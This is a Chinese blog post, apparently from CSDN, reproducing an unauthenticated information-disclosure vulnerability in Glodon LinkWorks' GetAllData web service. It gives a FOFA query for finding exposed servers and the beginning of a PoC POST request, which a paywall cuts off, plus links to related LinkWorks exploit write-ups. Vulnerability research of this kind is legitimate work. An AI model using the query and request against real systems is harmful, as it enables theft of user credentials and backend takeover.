广联达Linkworks GetAllData 信息泄露漏洞复现

已于 2024-02-24 19:14:35 修改
阅读量616 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-02-24 19:14:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136274877
版权

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达-Linkworks协同办公管理平台 GetAllData接口处存在信息泄露漏洞,未经身份认证的攻击者可获取用户名密码等敏感信息。破解密码md5可登录后台,使系统处于极不安全状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 8.
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【1day】复现广联达-Linkworks 协同办公管理平台ConfigService.asmx接口SQL注入漏洞
记录并分享学习安全的知识点..
08-12 669
广联达科技股份有限公司成立于1998年,以建设工程领域专业应用为核心基础支撑,以产业大数据、产业新金融等为增值服务的数字建筑平台服务商。广联达-Linkworks 协同办公管理平台ConfigService.asmx接口SQL注入漏洞
广联达OA sql注入.zip
08-24
已实现漏洞验证脚本
漏洞复现广联达-Linkworks-getauthorizekey-任意文件上传
知黑而守白
01-11 845
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。由于广联达 UserFilesUpload 接口处设置不当,未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)
0xSec
08-12 3702
​​由于 广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
漏洞复现广联达-Linkworks-DataSvc-GetAllData-未授权
知黑而守白
02-23 247
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。由于广联达 GetAllData 接口处设置不当,未经身份认证的攻击者通过构造特殊的数据包,可以访问系统敏感信息
新接口-广联达WebService GetAllData 信息泄露漏洞复现-0day未公开漏洞
weixin_43167326的博客
02-25 563
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达Q公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。
广联达Linkworks GetAllData 信息泄露漏洞
weixin_52204925的博客
02-25 1015
广联达-Linkworks协同办公管理平台 GetAllData接口处存在信息泄露漏洞,恶意可获取用户名密码等敏感信息。破解密码md5可登录后台。
漏洞复现广联达-Linkworks-gwgdwebservice-任意文件上传
知黑而守白
01-18 196
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。由于广联达 GWGDWebService 接口处设置不当,未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
广联达OA GetUserByUserCode SQL注入漏洞
xiaokp7的博客
09-13 447
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于 广联达 Linkworks办公OA GetUserByUserCode接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
【0day】复现广联达-Linkworks 协同办公管理平台GetUserByUserCode接口存在SQL注入漏洞
记录并分享学习安全的知识点..
08-12 692
广联达科技股份有限公司成立于1998年,以建设工程领域专业应用为核心基础支撑,以产业大数据、产业新金融等为增值服务的数字建筑平台服务商。广联达-Linkworks 协同办公管理平台GetUserByUserCode接口存在SQL注入漏洞
梦龙 梦龙梦龙梦龙梦龙
03-21
"梦龙LinkWorks信息系统平台应用培训" LinkWorks系统简介: LinkWorks是一款企业级协同工作平台,由梦龙科技开发,旨在帮助企业实现信息化、灵活性和复杂性。该平台集成了文档管理、工作管理、沟通管理、网络办公、...
测试用例+详细
04-22
7. 测试用例LinkWorks_WorkEvaluate_08:测试信息汇报页面的导航栏功能,包括正确显示模块名称、正确导航等。 8. 测试用例LinkWorks_WorkEvaluate_09:测试工作名称、负责人、考核人、开始日期、结束日期、工作量、...
测试用例实例++非常详细
08-29
9. 测试用例 LinkWorks_WorkEvaluate_10:测试工作考核系统界面的信息汇报页面导航栏功能,检查是否正确显示导航链接。 10. 测试用例 LinkWorks_WorkEvaluate_11:测试工作考核系统界面的工作名称、负责人、考核人...
软件测试用例模板一详细用例经典.doc
10-08
用例描述的目的是为了描述测试用例的详细信息,包括测试的前置条件、编号权限、测试项、测试类别、描述/输入/操作、期望结果、实际结果和备注等信息。 该软件测试用例模板详细用例经典提供了软件测试中的一些重要...
广联达 GetAllData 信息泄露漏洞
qq_36334672的博客
03-10 300
广联达-Linkworks协同办公管理平台 GetAllData接口处存在信息泄露漏洞,恶意可获取用户名密码等敏感信息。破解密码md5可登录后台。
【1day】复现广联达-Linkworks 协同办公管理平台信息泄露漏洞
记录并分享学习安全的知识点..
10-30 276
广联达科技股份有限公司成立于1998年,以建设工程领域专业应用为核心基础支撑,以产业大数据、产业新金融等为增值服务的数字建筑平台服务商。广联达-Linkworks 协同办公管理平台信息泄露漏洞,可根据泄露信息,伪造用户进行登录。 ​
漏洞复现广联达-Linkworks-登录绕过-GetSSOStamp
知黑而守白
03-27 496
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。广联达 GetSSOStamp 接口存在一个信息泄漏漏洞,使得未经授权的用户或攻击者构造特殊测数据包绕过登录校验访问后台。
广联达 Linkworks办公OA SQL注入漏洞
weixin_52204925的博客
01-23 544
广联达 Linkworks办公OA SQL注入漏洞
【启明智显产品分享】Model4 工业级HMI芯片详解(三):高安全、防抄板
ami82的博客
06-18 340
【高安全、防抄板】随着物联网和智能设备的快速发展,设备安全认证的需求日益迫切。硬件安全认证和保护在确保设备和身份安全中发挥着不可替代的作用,需要与软件安全相结合,共同构建全面的安全体系。
TCP协议是安全的吗?
最新发布
高行行
06-18 69
安全虽然 TCP 提供了一种可靠且高效的数据传输方式,但它不提供任何加密或身份验证机制来保护数据。因此,传输的数据可能会被未经授权的用户拦截和读取,而且其真实性无法验证。因此,为了确保 TCP 通信的安全,必须在 TCP 之上添加加密和身份验证等额外安全措施。与 TCP 结合使用的常见安全协议包括、SSH 和 IPSec。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值